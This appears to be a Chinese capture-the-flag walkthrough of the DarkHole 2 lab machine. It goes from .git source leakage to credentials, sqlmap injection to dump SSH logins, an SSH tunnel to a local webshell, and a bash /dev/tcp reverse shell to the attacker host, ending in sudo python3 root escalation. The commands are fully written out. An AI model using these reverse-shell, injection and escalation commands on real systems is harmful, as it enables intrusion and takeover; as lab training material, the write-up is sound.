信息收集
主机发现
nmap -sC -sV 192.168.93.0/24 -p-
目标:192.168.93.134 开放22ssh,80http
网站信息收集
并未发现太多信息
但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/
存在git泄露。
git泄露漏洞利用
下载git源码
python2 GitHack.py http://192.168.93.134/.git
密码逻辑流程
在logon.php中可以发现用户、密码的处理逻辑
将/.git下载到本地
wget -r http://192.168.93.134/.git
使用
git clone .git webapp
命令会将该目录创建一个webapp的源码文件,可以在其中执行所有 git 操作。
在webap下用git log ,发现在git日志当中存在修改记录,切换到该条记录下
git log
git checkout a4d9 切换到master a4的带有I added login.php file with default credentials
vim login.php 查看登录文件
账密:lush@admin.com 321
登录后台成功
漏洞利用sql注入
http://192.168.93.134/dashboard.php?id=1 此后台url非常的诱人
查看cookie
PHPSESSID:“hf076rm7rggldol19i8d5qmc3j”
sqlmap直接一把梭
sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j --dbs
sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 --tables
sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 -T ssh --dump
得到ssh 账户 jehad fool
webshell利用
ssh登陆之后发现为普通用户
sudo suid 系统内核版本 ssh免密登录等未发现利用方式
cat /etc/crontab 发现存在计划任务
本地还在监听一个奇怪的端口9999与losy用户计划任务的端口一样
dao opt下的web发现index.php是一个webshell
查看历史命令记录
尝试利用webshell
由于开放的127.0.0.1:9999 ,kali无法访问,只有靶机可访问,弹shell失败因此需要将端口带出内网
webshell利用 ssh正向代理
因为当前我们拥有ssh的账密,因此使用ssh隧道是不二选择
ssh -L 9999:127.0.0.1:9999 jehad@192.168.93.134
getshell
反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.93.130/7777 0>&1'
进行url编码
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27
kali监听7777
靶机通过get方式传参执行命令
http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27
在losy家目录下拿到第一面flag
提权
查看losy的历史命令发现密码
sudo -l 查看,发现可用root身份执行python3
结合前面的历史命令 python调sh
`sudo /usr/bin/python3 -c ‘import os; os.system("/bin/sh")’
`
成功提权,夺旗通关!
1339
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
